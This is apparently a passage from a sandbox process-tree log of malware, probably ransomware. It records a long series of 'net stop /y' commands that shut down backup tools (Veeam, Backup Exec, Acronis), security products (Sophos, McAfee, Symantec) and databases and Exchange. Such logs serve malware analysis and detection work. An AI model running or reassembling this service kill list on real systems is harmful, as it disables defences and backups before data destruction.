"net.exe" stop MSSQL$SYSTEM_BGC /y
3⤵
PID:1564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
4⤵
PID:2540

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
3⤵
PID:888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
4⤵
PID:2520

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
3⤵
PID:324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
4⤵
PID:2396

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:2144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:2536

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
3⤵
PID:1256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
4⤵
PID:2316

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
3⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
4⤵
PID:2364

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
3⤵
PID:2192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
4⤵
PID:2476

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
3⤵
PID:2096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
4⤵
PID:2268

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
3⤵
PID:1976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
4⤵
PID:2472

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
3⤵
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
4⤵
PID:2612

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:2400

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
3⤵
PID:1580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
4⤵
PID:2572

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:2588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:2960

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
3⤵
PID:1320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
4⤵
PID:2976

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:2564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:2924

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
3⤵
PID:2892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
4⤵
PID:2780

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:2952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:1508

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
3⤵
PID:2860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
4⤵
PID:1948

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
3⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
4⤵
PID:2904

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
3⤵
PID:2604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
4⤵
PID:3040

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
3⤵
PID:2652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
4⤵
PID:2156

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
3⤵
PID:820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
4⤵
PID:3016

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
3⤵
PID:2676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
4⤵
PID:2740

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
3⤵
PID:1524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
4⤵
PID:776

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
3⤵
PID:2088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
4⤵
PID:2052

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:3020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:1516

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
3⤵
PID:2496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
4⤵
PID:3068

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:2696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:2948

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
3⤵
PID:2608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
4⤵
PID:2828

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:2080

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
3⤵
PID:2940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
4⤵
PID:2076

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:1548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:2620

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:2664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:3060

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:2688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:2752

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
3⤵
PID:576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
4⤵
PID:2360

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:2336

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
3⤵
PID:2500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
4⤵
PID:2240

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:2544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:2812

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
3⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
4⤵
PID:2412

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:2340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:2332

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
3⤵
PID:2184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
4⤵
PID:2508

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
3⤵
PID:2208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
4⤵
PID:624

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
3⤵
PID:2168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
4⤵
PID:2272

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:1604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:2444

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:2252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:2392

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:2236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:2912

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
3⤵
PID:2396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
4⤵
PID:3036

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
3⤵
PID:2200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
4⤵
PID:2852

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
3⤵
PID:2320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
4⤵
PID:2640

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
3⤵
PID:2316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
4⤵
PID:2976

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
3⤵
PID:2460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
4⤵
PID:2908

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
3⤵
PID:2488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
4⤵
PID:2568

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:2248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:2356

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:2216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:3008

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
3⤵
PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
4⤵
PID:1160

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
3⤵
PID:2984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
4⤵
PID:1508

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
3⤵
PID:1220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
4⤵
PID:3052

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
3⤵
PID:2456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
4⤵
PID:1064

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
3⤵
PID:2148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
4⤵
PID:2896

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
3⤵
PID:2420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
4⤵
PID:2980

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
3⤵
PID:2740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
4⤵
PID:2580

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
3⤵
PID:2904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
4⤵
PID:2028

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
3⤵
PID:2080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
4⤵
PID:2800

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:2972

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
3⤵
PID:2092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
4⤵
PID:2592

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
3⤵
PID:2076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
4⤵
PID:1108

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:3032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:2840

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
3⤵
PID:2484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
4⤵
PID:1064

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
3⤵
PID:2680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
4⤵
PID:1700

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
3⤵
PID:2956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
4⤵
PID:2928

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
3⤵
PID:3040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
4⤵
PID:1500

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
3⤵
PID:3060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
4⤵
PID:2400

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
3⤵
PID:2448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
4⤵
PID:2152

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
3⤵
PID:564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
4⤵
PID:2428

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
3⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
4⤵
PID:2944

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
3⤵
PID:2784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
4⤵
PID:872

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:2172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:1600

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
3⤵
PID:2228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
4⤵
PID:2432

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
3⤵
PID:2540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
4⤵
PID:2988

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
3⤵
PID:2360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
4⤵
PID:2700

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
3⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
4⤵
PID:2260

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
3⤵
PID:2232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
4⤵
PID:1312

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
3⤵
PID:2724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
4⤵
PID:2488

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
3⤵
PID:332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
4⤵
PID:1348

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
3⤵
PID:2576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
4⤵
PID:2072

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
3⤵
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
4⤵
PID:2668

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
3⤵
PID:3056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
4⤵
PID:2920

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:1036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
4⤵
PID:2628

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:2520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:2156

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
3⤵
PID:2276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
4⤵
PID:2640

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
3⤵
PID:2272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
4⤵
PID:2528

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
3⤵
PID:1480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
4⤵
PID:2304

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
3⤵
PID:2572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
4⤵
PID:2604

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
3⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
4⤵
PID:2284

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
3⤵
PID:2184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
4⤵
PID:1976

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:1524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
4⤵
PID:2892

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
3⤵
PID:2236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
4⤵
PID:1580

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
3⤵
PID:2496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
4⤵
PID:2396

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
3⤵
PID:2208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
4⤵
PID:1572

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
3⤵
PID:2168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
4⤵
PID:2740

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
3⤵
PID:2860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
4⤵
PID:2264

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
3⤵
PID:2200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
4⤵
PID:2244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
3⤵
PID:2216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
4⤵
PID:2356

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
3⤵
PID:988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
4⤵
PID:2480

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
3⤵
PID:2880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
4⤵
PID:2552

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:3004

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
4⤵
PID:2468

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
3⤵
PID:888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
4⤵
PID:3048

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
3⤵
PID:1912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
4⤵
PID:2596

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
3⤵
PID:2104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
4⤵
PID:2616

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:2532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:2724

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
3⤵
PID:1468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
4⤵
PID:2460

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
3⤵
PID:2884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
4⤵
PID:1604

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
3⤵
PID:1340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
4⤵
PID:2892

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
3⤵
PID:2828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
4⤵
PID:2608

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
3⤵
PID:2928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
4⤵
PID:1508

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
3⤵
PID:2712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
4⤵
PID:564

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
3⤵
PID:1516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
4⤵
PID:324

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:2808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:2784

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
3⤵
PID:3068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
4⤵
PID:2584

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
3⤵
PID:924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
4⤵
PID:3056

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
3⤵
PID:2424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
4⤵
PID:2988

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:2732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
4⤵
PID:2940

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
3⤵
PID:3040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
4⤵
PID:820

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
3⤵
PID:1100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
4⤵
PID:2316

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
3⤵
PID:2412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
4⤵
PID:2080

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
3⤵
PID:2992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
4⤵
PID:332

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:2904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:3184

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
3⤵
PID:2748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
4⤵
PID:1968

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
3⤵
PID:2372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
4⤵
PID:3088

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
3⤵
PID:2140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
4⤵
PID:2980

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
3⤵
PID:2644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
4⤵
PID:3224

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
3⤵
PID:1892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
4⤵
PID:2088

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
3⤵
PID:1700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
4⤵
PID:3096

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
3⤵
PID:2280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
4⤵
PID:3200

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
3⤵
PID:624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
4⤵
PID:3124

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
3⤵
PID:2964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
4⤵
PID:2740

